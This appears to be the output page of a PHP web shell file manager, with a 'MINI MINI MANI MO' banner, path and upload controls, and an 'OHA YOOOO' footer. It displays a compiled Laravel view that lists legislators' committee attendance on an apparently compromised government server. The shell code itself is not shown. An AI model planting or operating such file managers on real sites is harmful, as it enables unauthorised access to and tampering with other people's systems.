MINI MINI MANI MO

Path : /var/www/html/sistemas/saplxi/storage/framework/views/
File Upload :
Current File : /var/www/html/sistemas/saplxi/storage/framework/views/7021e71d947c253b736cc514d20a701e83069335.php

<?php $__env->startSection("content"); ?>
    <!-- invoice list -->
    <section class="invoice-list-wrapper section">
        <!-- create invoice button-->
        <!-- Options and filter dropdown button-->
        <div class="seaction">
            <div class="row">
                <div class="col s12 m12 l12">
                    <div id="button-trigger2" class="card card card-default scrollspy">
                        <div class="card-content">
                            <!-- create invoice button-->
                            <div class="row">
                                <div class="input-field col s8">
                                    <h1><?php if($comision->comision_unida): ?> <?php $data = app('\App\Http\Controllers\MCG\ComisionesController'); ?><?php $__currentLoopData = $data->ComisionUnidaNombre($comision->id); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $valor): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?><?php echo e($valor); ?><br><?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php else: ?> <?php echo e($comision->comision->nombre); ?> <?php endif; ?></h1>
                                    <h4>Asistencias</h4>
                                </div>
                            </div>
                            <br>
                            <?php echo Form::open(['route'=>['mcg.asistencias_comision_save', base64_encode(base64_encode($comision->id))], 'method'=>'PUT', 'role' => 'form','id' => 'form-asistencia']); ?>

                            <?php echo Form::close(); ?>

                            <div class="responsive-table">
                                <table class="table white border-radius-4 pt-1">
                                    <thead>
                                    <tr>
                                        <th style="width: 10%">
                                            <span>#</span>
                                        </th>
                                        <th style="width: 40%">Diputado</th>
                                        <th style="width: 10%">Partido</th>
                                        <th>Sentido</th>
                                    </tr>
                                    </thead>
                                    <tbody>
                                    <?php $__currentLoopData = $diputados; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $com => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <?php $__currentLoopData = $value; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                            <tr>
                                                <td><?php echo e($key+1); ?></td>
                                                <td><?php echo e($item->diputado->apaterno); ?> <?php echo e($item->diputado->amaterno); ?> <?php echo e($item->diputado->nombres); ?><br><?php echo e($item->cargo); ?><br><?php $data = app('\App\Http\Controllers\MCG\ComisionesController'); ?><?php echo e($data->ComisionNombre($com)); ?></td>
                                                <td>
                                                    <img width="50%"
                                                        src="<?php echo e(asset("/storage/img/partidos/".$item->diputado->partido->emblema)); ?>">
                                                </td>
                                                <td>
                                                    <?php echo e(($item->diputado->asistencia_comision()->whereIdSesion($comision->id)->whereIdComision($com)->first() ?  $estatus[$item->diputado->asistencia_comision()->whereIdSesion($comision->id)->whereIdComision($com)->first()->asistencia] : "SIN REGISTRO")); ?><br>
                                                    <!--Voto: <?php echo e(($item->diputado->votaciones()->whereIdSesionesComision($comision->id)->whereIdComision($com)->first() ? $estatusVotos[$item->diputado->votaciones()->whereIdSesionesComision($comision->id)->whereIdComision($com)->first()->voto] : "SIN REGISTRO")); ?>-->
                                                    
                                                </td>
                                            </tr>
                                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                    </tbody>
                                </table>
                                
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
<?php $__env->stopSection(); ?>

<?php echo $__env->make("layout.pages.app", \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/legislaedomex/public_html/legislativoedomex/resources/views/pages/eventosComision/asistencias.blade.php ENDPATH**/ ?>

OHA YOOOO